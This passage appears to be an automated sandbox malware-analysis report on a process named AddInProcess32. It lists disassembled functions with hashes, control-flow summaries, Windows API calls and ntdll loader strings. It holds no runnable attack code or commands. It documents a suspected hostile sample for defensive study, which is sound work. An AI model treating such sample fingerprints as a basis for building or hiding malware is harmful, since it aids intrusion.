                                              • Opcode Fuzzy Hash: e828e5af29d6cbfbd5480d928985d5a155fbd5db624940a0c3946598f6886fea
                                              • Instruction Fuzzy Hash: 34E092B2204214BBD710EE99DC41F9B73ACEFC9714F40401DFA08A7282D671BD148BB4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0042B323 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 113 42b323-42b35c call 404b13 call 42c003 ExitProcess
                                              APIs
                                              • ExitProcess.KERNEL32(?,00000000,?,?,B214C5E9,?,?,B214C5E9), ref: 0042B357
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 5b96cdfe41595bd56a3cfd3f0329c7c774ad83a0ae2275ecbfc3f0cfb92f809f
                                              • Instruction ID: ca9911d01882747def141ed0d31310dee800a7ec4046bb6dd67a5bcedc598c9f
                                              • Opcode Fuzzy Hash: 5b96cdfe41595bd56a3cfd3f0329c7c774ad83a0ae2275ecbfc3f0cfb92f809f
                                              • Instruction Fuzzy Hash: 4DE08631205214BBD220FB5ADC41FDB776CDFC5714F41401AFA0867186CA75B91187F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00417428 Relevance: 1.5, APIs: 1, Instructions: 13libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 118 417428-41742a 119 417499-4174a7 LdrLoadDll 118->119 120 4174aa-4174ad 119->120
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174A5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2951814357.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 146664376ac0fdd2bf98085cc1dae65bf42a5c4d0056a86c6130df0841423d97
                                              • Instruction ID: 4da8aff46d215fa6e7b44bab41601b1eb95e35b475a1bfba14afcd95c88f60d9
                                              • Opcode Fuzzy Hash: 146664376ac0fdd2bf98085cc1dae65bf42a5c4d0056a86c6130df0841423d97
                                              • Instruction Fuzzy Hash: 9EC0807874410A7FD641CAC8CC41F99F774D748704F0043C5BA0CD7180D57069408754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B02C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 121 1b02c0a-1b02c0f 122 1b02c11-1b02c18 121->122 123 1b02c1f-1b02c26 LdrInitializeThunk 121->123
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: caeac1787419950f8b3d300d3ae4a166c1f01097aadfd5bedeffd894b333a90f
                                              • Instruction ID: 96cc5022c58a0e70c062a73b8e88c540ed15582a41978cfd82787951cd5f041c
                                              • Opcode Fuzzy Hash: caeac1787419950f8b3d300d3ae4a166c1f01097aadfd5bedeffd894b333a90f
                                              • Instruction Fuzzy Hash: FEB09B739415C5C6DA16E764460C7177D00B7D1701F56C0E5D2030687F8738C1D5E275
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 01B42349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2160512332
                                              • Opcode ID: 417c257a3b805366330107fda32c923cce227681c3f06716d247cf170734c04a
                                              • Instruction ID: 5690a1c7cb5251ff17af8ca0e44b8ed22e73363d1613751c175805604e387e09
                                              • Opcode Fuzzy Hash: 417c257a3b805366330107fda32c923cce227681c3f06716d247cf170734c04a
                                              • Instruction Fuzzy Hash: EC92A071604342ABEB29DF19D880B6BBBE8FF84710F04899DFA94D7251D770D844EB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B70274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 0-1700792311
                                              • Opcode ID: ea3ff458f4b89ebd8b63bd95e534705df728deaefd471ba45a4f1ff1fcccdcd8
                                              • Instruction ID: 565382365c1a940a291e39d2179d42e874d80befc54f1f4b259fa479a9704235
                                              • Opcode Fuzzy Hash: ea3ff458f4b89ebd8b63bd95e534705df728deaefd471ba45a4f1ff1fcccdcd8
                                              • Instruction Fuzzy Hash: F7D1F431500686EFDB2AEF69C491AADBBF5FF5A700F08809AF4569B653C774D980CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AF63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-792281065
                                              • Opcode ID: 719d6c6af1d6967ce259e0d4ee579e9fba8afa750a707b4d376878ef4ae0bb01
                                              • Instruction ID: c1e302b0140ddb17500204d11ecff5c3e723817a9abebaae2142db289539652b
                                              • Opcode Fuzzy Hash: 719d6c6af1d6967ce259e0d4ee579e9fba8afa750a707b4d376878ef4ae0bb01
                                              • Instruction Fuzzy Hash: 73913830B007159BEB39EF59DD84BAA7BA1FF81B14F0401ADFA047B682D7B49851C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AB645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                              Download Yara Rule
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B19A11, 01B19A3A
                                              • apphelp.dll, xrefs: 01AB6496
                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B19A01
                                              • LdrpInitShimEngine, xrefs: 01B199F4, 01B19A07, 01B19A30
                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B19A2A
                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B199ED
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-204845295
                                              • Opcode ID: e1ce316e43fa7d9d31d332ab0be7b3e89b3304c214005a7bf70b1e32c16541ae
                                              • Instruction ID: a645343f28050f51aa8c0accb2e80477dac505079ae4897105e27dedb4efc900
                                              • Opcode Fuzzy Hash: e1ce316e43fa7d9d31d332ab0be7b3e89b3304c214005a7bf70b1e32c16541ae
                                              • Instruction Fuzzy Hash: 16511272218344AFE724DF24C991FAB77E8FF84648F84091EF589971A5D770E904CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ACA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                              • API String ID: 0-379654539
                                              • Opcode ID: 9b95e756577133fa11e214558a8e3f4e750a493d7dd77fa1594e2c977634d026
                                              • Instruction ID: b704145a054531d1ad9845ae7ff3a75a50bfe208bd3b3a123a315db903d0ba39
                                              • Opcode Fuzzy Hash: 9b95e756577133fa11e214558a8e3f4e750a493d7dd77fa1594e2c977634d026
                                              • Instruction Fuzzy Hash: 39C1687420838A8BDB15CF68C144B6AB7F4BF94B04F0489AEF996CB251E734C949CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AF8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpInitializeProcess, xrefs: 01AF8422
                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AF855E
                                              • minkernel\ntdll\ldrinit.c, xrefs: 01AF8421
                                              • @, xrefs: 01AF8591
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1918872054
                                              • Opcode ID: 62b6aa7d20310a979f6db99efc11fffa1e1cad359409ee4960592813a4006be9
                                              • Instruction ID: bb6bad8e9efa9451868981f98537e5537f49ade3d79ad6ef0211e27b3c47ea33
                                              • Opcode Fuzzy Hash: 62b6aa7d20310a979f6db99efc11fffa1e1cad359409ee4960592813a4006be9
                                              • Instruction Fuzzy Hash: F991BA71508745AFDB22EF65CC84EABBAE8FF84750F40096EFA84D2141E338D944CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AC64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                              Download Yara Rule
                                              Strings
                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B210AE
                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B21028
                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B2106B
                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B20FE5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                              • API String ID: 0-1468400865
                                              • Opcode ID: 9da0d47b589836a2a9aeaae8ec854e927dad8f46c772a76c9699ee66a29e041e
                                              • Instruction ID: 8f7b60c261ef08ac4303ef753052fe0d9c129d94d5f328d695725de257c34aec
                                              • Opcode Fuzzy Hash: 9da0d47b589836a2a9aeaae8ec854e927dad8f46c772a76c9699ee66a29e041e
                                              • Instruction Fuzzy Hash: 2371AF719043499FCB21EF28C884F977FA8EFA4B64F5404A8F9498B286D734D589CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AE245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B2A9A2
                                              • apphelp.dll, xrefs: 01AE2462
                                              • LdrpDynamicShimModule, xrefs: 01B2A998
                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B2A992
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-176724104
                                              • Opcode ID: 2055e5a6d4104ef246091d933855995e981efb0230ed868979493aaf698d1137
                                              • Instruction ID: 6a42f6bacad9023595ec8ce7173172b965dd746fb78264d490f4c9a86977b034
                                              • Opcode Fuzzy Hash: 2055e5a6d4104ef246091d933855995e981efb0230ed868979493aaf698d1137
                                              • Instruction Fuzzy Hash: 2C314671A00212ABDB399F6AD8C5AAA77F8FF84B00F15009AE90467A55C7B06985CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ABA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: FilterFullPath$UseFilter$\??\
                                              • API String ID: 0-2779062949
                                              • Opcode ID: b8dc3605651ad4ffed766ddf16ef480a8f9450be4ad17e3516cdb9fecd56be96
                                              • Instruction ID: 6537e6c9fba25c6a0c0dd2985e95cb658f60349ca8d23e1267a80c479a4c0e5b
                                              • Opcode Fuzzy Hash: b8dc3605651ad4ffed766ddf16ef480a8f9450be4ad17e3516cdb9fecd56be96
                                              • Instruction Fuzzy Hash: EBA149719416299BDF359F68DC88BEABBB8EF48700F1101E9EA09A7250D7359E84CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B7C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                              Download Yara Rule
                                              Strings
                                              • PreferredUILanguages, xrefs: 01B7C212
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01B7C1C5
                                              • @, xrefs: 01B7C1F1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                              • API String ID: 0-2968386058
                                              • Opcode ID: eea8c353a9247ea833b84ef08dee202f46c81aeaddb4b6883e8ad2f1f52ab99a
                                              • Instruction ID: f87bc2ce437a380934394ea5b43c2e44e621c93a4e93db9fc50686fe6c8a2135
                                              • Opcode Fuzzy Hash: eea8c353a9247ea833b84ef08dee202f46c81aeaddb4b6883e8ad2f1f52ab99a
                                              • Instruction Fuzzy Hash: E2414171E0020AEBDF15DED8C995BEEBBB8EB14704F1441AEE619F7280E7749A448B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B54144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                              • API String ID: 0-1373925480
                                              • Opcode ID: fb62abd7a101ee82e41797f8ef4d9652fbf69005295e9efc260aae3527cfca24
                                              • Instruction ID: 8ea04d4521a842d2a14489ae6bd0253e58037dbbad9194a21541c18bc17a39a7
                                              • Opcode Fuzzy Hash: fb62abd7a101ee82e41797f8ef4d9652fbf69005295e9efc260aae3527cfca24
                                              • Instruction Fuzzy Hash: 8C412772A006588BEF6ADBDAC944BADBBB4FF55380F140499DD01EB781E7358981CB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                              Download Yara Rule
                                              Strings
                                              • Process initialization failed with status 0x%08lx, xrefs: 01B420F3
                                              • minkernel\ntdll\ldrinit.c, xrefs: 01B42104
                                              • LdrpInitializationFailure, xrefs: 01B420FA
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2986994758
                                              • Opcode ID: 46b97219213df8f7b56c31acb8616d18b09cb879e4b7ab1e1b39cfd1c629132a
                                              • Instruction ID: c1e6446e4b9eeb9ed87febebea21d601a26da4d21044fe38e73a2db18b987b40
                                              • Opcode Fuzzy Hash: 46b97219213df8f7b56c31acb8616d18b09cb879e4b7ab1e1b39cfd1c629132a
                                              • Instruction Fuzzy Hash: 56F0F635640308BBEB28EA4EDC43FA93BA8FB44B54F5440D9FB00B7681D3F0A950DA91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AD03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: #%u
                                              • API String ID: 48624451-232158463
                                              • Opcode ID: 7e03d612da2fe1e217535a9baf690991e71c77bb2722a829b0c85985f63a035c
                                              • Instruction ID: ff90410244ae639b386462647a2c9ff47c0f952de96a13b2dde6ec484737ada1
                                              • Opcode Fuzzy Hash: 7e03d612da2fe1e217535a9baf690991e71c77bb2722a829b0c85985f63a035c
                                              • Instruction Fuzzy Hash: 0A7159B1A0050A9FDB05DFA8C980FAEBBF8FF18304F1440A5E905A7251EB74ED05CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B8A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                              • Instruction ID: d7cde51c1488c69299cb59f9cf450c4247a8257a4307568154e16c534a21f954
                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                              • Instruction Fuzzy Hash: 17C1D3312043429BEB29EF28C841B6BBBE5EFC4B18F084A6EF69687290D774D545CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$MUI
                                              • API String ID: 0-17815947
                                              • Opcode ID: d56dc862b25a7fd835eff7789d406578a573a8cd8b5820438b75da37f59c382f
                                              • Instruction ID: ae3c0b0def56e894d35a6331c52697f8b99d93a1c3c8a48604ddb9b8182b4c93
                                              • Opcode Fuzzy Hash: d56dc862b25a7fd835eff7789d406578a573a8cd8b5820438b75da37f59c382f
                                              • Instruction Fuzzy Hash: 4D5147B1E0061DAEDF15DFA9CD84AEEBBBCEB14754F100169E601A7290D7349E05CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AC04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                              Download Yara Rule
                                              Strings
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01AC063D
                                              • kLsE, xrefs: 01AC0540
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              • API String ID: 0-2547482624
                                              • Opcode ID: 0aed5037cc030b5b8bf7c56ccc61d654e1bed92d8bb62ef90838d514d863dbfc
                                              • Instruction ID: d29e368f5182eb5c23412a5de47799b3615f28b0e5bd4d1e664d222dd4707cd1
                                              • Opcode Fuzzy Hash: 0aed5037cc030b5b8bf7c56ccc61d654e1bed92d8bb62ef90838d514d863dbfc
                                              • Instruction Fuzzy Hash: AD51BE79500746DFDB24EF38C6846A3BBE4AF84B04F10883EF69A87241E7B09545CF92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ACA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                              Download Yara Rule
                                              Strings
                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 01ACA309
                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 01ACA2FB
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                              • API String ID: 0-2876891731
                                              • Opcode ID: b2c1378e958c7a0997be0e3b2dba3c1bbcf47e888cd65e289adeb4e0ccd63cb0
                                              • Instruction ID: 089a5fea0f919ab9cad65ef92c6ad1f9caadc424745834183fa369e7245b62b6
                                              • Opcode Fuzzy Hash: b2c1378e958c7a0997be0e3b2dba3c1bbcf47e888cd65e289adeb4e0ccd63cb0
                                              • Instruction Fuzzy Hash: 9F41DE79A00659DBDB25CF69C854B7A7BB4FF84B00F1880A9E909DB391E3B5D940CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01AFA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Cleanup Group$Threadpool!
                                              • API String ID: 2994545307-4008356553
                                              • Opcode ID: 3ddad3936b6ec3b4c0cd6bb275ee850ff32d943f59131aaad4a6409659d1d1f4
                                              • Instruction ID: 93727658da45eebc64f312752c8ba78aa90f6f263407c911e8d7b0c486e898f0
                                              • Opcode Fuzzy Hash: 3ddad3936b6ec3b4c0cd6bb275ee850ff32d943f59131aaad4a6409659d1d1f4
                                              • Instruction Fuzzy Hash: 7B01D1B2650700AFE362DF64CD46B5677E8E784715F04897DB64CC7590E374D804CB46
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01ACC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: MUI
                                              • API String ID: 0-1339004836
                                              • Opcode ID: 575ac3d8eeb072757d521978ce471dc6b1db76bb2a3f849d83949d588e0abf5c
                                              • Instruction ID: fd8fb5debc53c076c488350408df3450847599bceec5c41c4505c91a708101ab
                                              • Opcode Fuzzy Hash: 575ac3d8eeb072757d521978ce471dc6b1db76bb2a3f849d83949d588e0abf5c
                                              • Instruction Fuzzy Hash: E5825A75E002199FEB25CFADC980BEDBBB1BF48B20F14816DD919AB355D7309981CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B46420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 77951f04850fd49bbf5843e652488b2186d5d1b1d930cae94393fccf3dd5db05
                                              • Instruction ID: b566b4de195314521937629aafcea29ece7c9f5027958b5e40b1b57872062fd4
                                              • Opcode Fuzzy Hash: 77951f04850fd49bbf5843e652488b2186d5d1b1d930cae94393fccf3dd5db05
                                              • Instruction Fuzzy Hash: F7918FB1A40219AFEB25DF94CD85FAEBBB8EF19750F104065F600AB190D774AD04DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B6E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 0d1bc710e45664591feaf5a42aa51d303a16bf5cf368f0a1745a9e97e79a710d
                                              • Instruction ID: 66478ae0ca6b19a8da4d84071ff9f2a9ea2a758218a2649ab02fbfac59b14471
                                              • Opcode Fuzzy Hash: 0d1bc710e45664591feaf5a42aa51d303a16bf5cf368f0a1745a9e97e79a710d
                                              • Instruction Fuzzy Hash: 9891BE76900609AEDF2AEBA5DD84FAFBB7EEF65740F000069F601A7250DB38D905CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01B62000 Relevance: .8, Instructions: 757COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2952730588.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_1a90000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
